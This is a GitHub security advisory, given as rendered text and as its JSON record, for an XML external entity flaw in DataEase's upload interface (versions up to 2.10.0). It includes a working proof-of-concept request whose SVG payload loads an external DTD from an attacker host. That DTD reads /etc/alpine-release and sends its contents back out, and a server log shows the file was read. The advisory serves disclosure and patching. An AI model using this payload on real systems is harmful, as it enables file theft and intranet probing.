ghsa-4m9p-7xg6-f4mm
Vulnerability from github
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Impact
There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.
- send request: ``` POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, / out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn
------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--
// 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///etc/alpine-release"> <!ENTITY % LoadOOBEnt "<!ENTITY % OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>"> ```
- After sending the request, the content of the file /etc/alpine-release is successfully read
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 - ::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
Affected versions: <= 2.10.0
Patches
The vulnerability has been fixed in v2.10.1.
Workarounds
It is recommended to upgrade the version to v2.10.1.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease Email us at wei@fit2cloud.com
{ "affected": [ { "database_specific": { "last_known_affected_version_range": "\u003c= 2.10.0" }, "package": { "ecosystem": "Maven", "name": "io.dataease:common" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.10.1" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-46985" ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2024-09-23T20:27:22Z", "nvd_published_at": "2024-09-23T16:15:06Z", "severity": "HIGH" }, "details": "### Impact\nThere is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.\n\n1. send request:\n```\nPOST /de2api/staticResource/upload/1 HTTP/1.1\nHost: dataease.ubuntu20.vm\nContent-Length: 348\nAccept: application/json, text/plain, */*\nout_auth_platform: default\nX-DE-TOKEN: jwt\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn\n\n------WebKitFormBoundary6OZBNygiUCAZEbMn\nContent-Disposition: form-data; name=\"file\"; filename=\"1.svg\"\nContent-Type: a\n\n\u003c?xml version=\u00271.0\u0027?\u003e\n \u003c!DOCTYPE xxe [\n \u003c!ENTITY % EvilDTD SYSTEM \u0027http://10.168.174.1:8000/1.dtd\u0027\u003e\n %EvilDTD;\n %LoadOOBEnt;\n %OOB;\n ]\u003e\n------WebKitFormBoundary6OZBNygiUCAZEbMn--\n\n// 1.dtd\u7684\u5185\u5bb9\n\u003c!ENTITY % resource SYSTEM \"file:///etc/alpine-release\"\u003e\n \u003c!ENTITY % LoadOOBEnt \"\u003c!ENTITY \u0026#x25; OOB SYSTEM \u0027http://10.168.174.1:8000/?content=%resource;\u0027\u003e\"\u003e\n```\n\n2. After sending the request, the content of the file /etc/alpine-release is successfully read\n```\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /1.dtd HTTP/1.1\" 200 -\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /?content=3.20.0 HTTP/1.1\" 200 -\n```\n\nAffected versions: \u003c= 2.10.0\n\n### Patches\nThe vulnerability has been fixed in v2.10.1.\n\n### Workarounds\nIt is recommended to upgrade the version to v2.10.1.\n\n### References\nIf you have any questions or comments about this advisory:\n\nOpen an issue in https://github.com/dataease/dataease\nEmail us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)\n", "id": "GHSA-4m9p-7xg6-f4mm", "modified": "2024-09-23T20:27:22Z", "published": "2024-09-23T20:27:22Z", "references": [ { "type": "WEB", "url": "https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46985" }, { "type": "PACKAGE", "url": "https://github.com/dataease/dataease" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "type": "CVSS_V3" }, { "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N", "type": "CVSS_V4" } ], "summary": "DataEase has an XML External Entity Reference vulnerability" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.